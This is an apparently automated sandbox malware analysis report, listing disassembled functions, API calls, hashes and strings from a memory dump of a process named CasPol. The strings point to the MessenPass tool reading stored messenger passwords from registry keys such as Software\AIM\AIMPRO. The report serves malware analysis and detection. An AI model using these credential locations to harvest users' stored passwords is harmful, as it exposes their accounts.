                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$FileTime$CloseCompareHandlememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3621460190-0
                                                                                                                                                                                    • Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                                                                                                                                                                    • Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
                                                                                                                                                                                    • Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65
                                                                                                                                                                                    Function 00411DAE Relevance: 1.5, APIs: 1, Instructions: 28registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                      • Part of subcall function 00411D82: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000,?,00000000,00000000), ref: 00411DE3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                    • Opcode ID: ce370e884ce507cf8d68f29c6deb264c45e70fef735a89ca04c9f3106877318e
                                                                                                                                                                                    • Instruction ID: e75928c52d3f354008a7740bfd8d53285fea356ba949639daa147f4e4c12ed07
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce370e884ce507cf8d68f29c6deb264c45e70fef735a89ca04c9f3106877318e
                                                                                                                                                                                    • Instruction Fuzzy Hash: BFE0ED7A600108BBDF119F96ED069DE7BA9EF84355B104025FE0191121E631EE50DA54
                                                                                                                                                                                    Function 00411D82 Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                                    • Opcode ID: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                                                                                                                                                                    • Instruction ID: a80749d54e4db297dbe5ce684396449be2bdfe43891eac82306683b5e99974c7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21E0B675504208FADB01CB90DC41EEE7BBCEB44644F1041AAB90596151E672AB449B64
                                                                                                                                                                                    Function 00411D37 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E
                                                                                                                                                                                      • Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
                                                                                                                                                                                      • Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
                                                                                                                                                                                      • Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                                                    • Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                                                                                                                                                                    • Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
                                                                                                                                                                                    • Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                                                                                                                                                                    • Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84
                                                                                                                                                                                    Function 00411DEE Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Enum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2928410991-0
                                                                                                                                                                                    • Opcode ID: a06bf5f15d9de0ab9359c487783e21236e19a74e9470d356b60f65c87538d07b
                                                                                                                                                                                    • Instruction ID: cd556759a7b58b048314e6dc47e00111cf408287f7a5d392ad8679ce4621aa7a
                                                                                                                                                                                    • Opcode Fuzzy Hash: a06bf5f15d9de0ab9359c487783e21236e19a74e9470d356b60f65c87538d07b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 82D042B550010EBFDB01DFA0DD05DEA7BBDEB04248F008061BD15D6150D6719A15ABA4
                                                                                                                                                                                    Function 004067D3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004067E5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                                                                                                                                                                    • Instruction ID: 92edde76bd8748fbe9720986c638c7b7c767b624a816766c44db5ce3c9f9c76e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C012F0790300BEFF214B10AE0EFB7355DD7C0700F1084207E40E80E0C2E14C008524
                                                                                                                                                                                    Function 004067BA Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004067CC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                                                                                                                                                                    • Instruction ID: 6b5441a44151c9e47baf98361d0eca158f6ada1b16bcce3b9b94d573676807d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                                                                                                                                                                    • Instruction Fuzzy Hash: 63C092B0690200BEFE224A10AE19FB6255DD780700F2044247E40E80E0C1A14D108524
                                                                                                                                                                                    Function 00404CE0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                                                                                                    • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
                                                                                                                                                                                    Function 00412111 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                    • Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                                                                                                                                                                    • Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605
                                                                                                                                                                                    Function 00407930 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                    • Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                                                                                                                                                                    • Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04
                                                                                                                                                                                    Function 00411D68 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                    • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                                                                                                    • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
                                                                                                                                                                                    • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57
                                                                                                                                                                                    Function 004069D3 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                                                                                                                                                                    • Instruction ID: 66443cf59350c8d7b1baefe17900325ca04844ca679cc43594c3e66389cfa9db
                                                                                                                                                                                    • Opcode Fuzzy Hash: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48B012752104009BCB090B34DD451CD35505F84631720473CB033C40F0E720CC60BA00
                                                                                                                                                                                    Function 0040763D Relevance: 1.4, APIs: 1, Instructions: 125COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040733E: free.MSVCRT ref: 00407341
                                                                                                                                                                                      • Part of subcall function 0040733E: free.MSVCRT ref: 00407349
                                                                                                                                                                                    • free.MSVCRT ref: 004076FE
                                                                                                                                                                                      • Part of subcall function 0040746B: free.MSVCRT ref: 00407478
                                                                                                                                                                                      • Part of subcall function 00406982: malloc.MSVCRT ref: 0040699E
                                                                                                                                                                                      • Part of subcall function 00406982: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004040EC,00000001,?,?,00000000,004038B8,?), ref: 004069B6
                                                                                                                                                                                      • Part of subcall function 00406982: free.MSVCRT ref: 004069BF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$mallocmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3401966785-0
                                                                                                                                                                                    • Opcode ID: a4567759523b462432c12eb11e91ffb42e0f8369e7a01884216bb8d5b0a4d56e
                                                                                                                                                                                    • Instruction ID: b06fda5518f963637e47ccf192b1716b30a75dcabc41381d830fd598182c4e3b
                                                                                                                                                                                    • Opcode Fuzzy Hash: a4567759523b462432c12eb11e91ffb42e0f8369e7a01884216bb8d5b0a4d56e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 81413775D082099FCB20DF99C48099DBBB1BB58324F24817AD951B7381D738BE86CB96

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 0040B4F6 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 286windowregistrystringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00408A29: LoadMenuA.USER32(00000000), ref: 00408A31
                                                                                                                                                                                      • Part of subcall function 00408A29: sprintf.MSVCRT ref: 00408A54
                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040B61C
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040B64F
                                                                                                                                                                                    • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040B667
                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040B6C7
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040B799
                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MessenPass), ref: 0040B7AE
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040B7E1
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0041E678), ref: 0040B7FB
                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,0041E678), ref: 0040B80B
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B812
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B820
                                                                                                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040B86D
                                                                                                                                                                                      • Part of subcall function 00404E68: strlen.MSVCRT ref: 00404E85
                                                                                                                                                                                      • Part of subcall function 00404E68: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404EA9
                                                                                                                                                                                    • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040B8DD
                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040B8F0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$strlen$LoadMenu$AttributesClipboardCreateDeleteFileFocusFormatImagePathRegisterTempWindow_strcmpisprintf
                                                                                                                                                                                    • String ID: /noloadsettings$/sm$Software\NirSoft\MessenPass$SysListView32$commdlg_FindReplace$report.html$xA
                                                                                                                                                                                    • API String ID: 2862451953-132385428
                                                                                                                                                                                    • Opcode ID: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                                                                                                                                                                    • Instruction ID: 58ee6bec69cc5a2ead352e1dc17fbc33d0493dc4f48ef93b1c15430ab04c662e
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FC1F271500244EFEB129F64C84ABDA7FA5EF54708F04407EFA446F2D2CBB95944CBA9
                                                                                                                                                                                    Function 0040244D Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 132COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040246E
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 0040248C
                                                                                                                                                                                      • Part of subcall function 004029D9: strlen.MSVCRT ref: 004029E6
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004024B9
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004024C8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,00000048), ref: 004025B4
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 004025F4
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004025FC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@$ByteCharMultiWidememcpymemsetstrlen
                                                                                                                                                                                    • String ID: '$)$)$0$5$:$G$W$X$[$[$f
                                                                                                                                                                                    • API String ID: 3606715663-4187034442
                                                                                                                                                                                    • Opcode ID: eb4cb5288cefc1ac96e036f9ba56fed45c85b445ab59d8c0a1efc0d2338e08cd
                                                                                                                                                                                    • Instruction ID: d66295c9476db63dbc5c32b0f61e30ac1af87f583ef6fa4ed04bb8f7da70bc00
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb4cb5288cefc1ac96e036f9ba56fed45c85b445ab59d8c0a1efc0d2338e08cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98514C218087CEDDDB22D7BC98486DEBF745F26224F0843D9E1E47B2D2D265064AC77A
                                                                                                                                                                                    Function 004124D4 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                    • API String ID: 633282248-1996832678
                                                                                                                                                                                    • Opcode ID: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                                                                                                                                                                    • Instruction ID: 0d87bc4a3c90cd549b7ee136a842ac2d8ae4f17c90590582d174715666fd6da4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                                                                                                                                                                    • Instruction Fuzzy Hash: CB31C7B2801215BEDB10AE549D939CAF76CAF10315F1441AFF514B2181EABC9FD08BAD
                                                                                                                                                                                    Function 004010D0 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401118
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401126
                                                                                                                                                                                      • Part of subcall function 00406D6B: ShellExecuteA.SHELL32(?,open,?,00417C88,00417C88,00000005), ref: 00406D81
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401161
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 0040116F
                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 00401186
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040118D
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040119D
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B1
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011BF
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011C7
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 004011E5
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004011F1
                                                                                                                                                                                    • SetWindowTextA.USER32(?,MessenPass), ref: 00401204
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040121C
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040122D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Text$Window$ChildColorCursorFromPoint$BrushDeleteDialogExecuteLoadModeObjectShell
                                                                                                                                                                                    • String ID: MessenPass
                                                                                                                                                                                    • API String ID: 2410034309-1347981195
                                                                                                                                                                                    • Opcode ID: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                                                                                                                                                                    • Instruction ID: 61c274a33cdd550ae885db2c0d410d86e96b4f8b628e001bd40ef85afa118776
                                                                                                                                                                                    • Opcode Fuzzy Hash: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D31D271500A4AFBDB026FA0DD49EEABB7AFB44301F508236F915E61B0C7759861DB88
                                                                                                                                                                                    Function 00409068 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(0041E200,?), ref: 00409080
                                                                                                                                                                                    • _mbscpy.MSVCRT(0041E308,general,0041E200,?), ref: 00409090
                                                                                                                                                                                      • Part of subcall function 00408CA1: memset.MSVCRT ref: 00408CC6
                                                                                                                                                                                      • Part of subcall function 00408CA1: GetPrivateProfileStringA.KERNEL32(0041E308,?,00417C88,?,00001000,0041E200), ref: 00408CEA
                                                                                                                                                                                      • Part of subcall function 00408CA1: WritePrivateProfileStringA.KERNEL32(0041E308,?,?,0041E200), ref: 00408D01
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_00008EAA,00000000), ref: 004090D1
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_00008EAA,00000000), ref: 004090DB
                                                                                                                                                                                    • _mbscpy.MSVCRT(0041E308,strings), ref: 004090E3
                                                                                                                                                                                    • memset.MSVCRT ref: 004090FF
                                                                                                                                                                                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409113
                                                                                                                                                                                      • Part of subcall function 00408D0F: _itoa.MSVCRT ref: 00408D30
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                    • API String ID: 1035899707-2179912348
                                                                                                                                                                                    • Opcode ID: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                                                                                                                                                                    • Instruction ID: 8f59c47c41e75b0ef1e028ad246d3c9450943cc5e9d1e56adfa21ee2aa94ac58
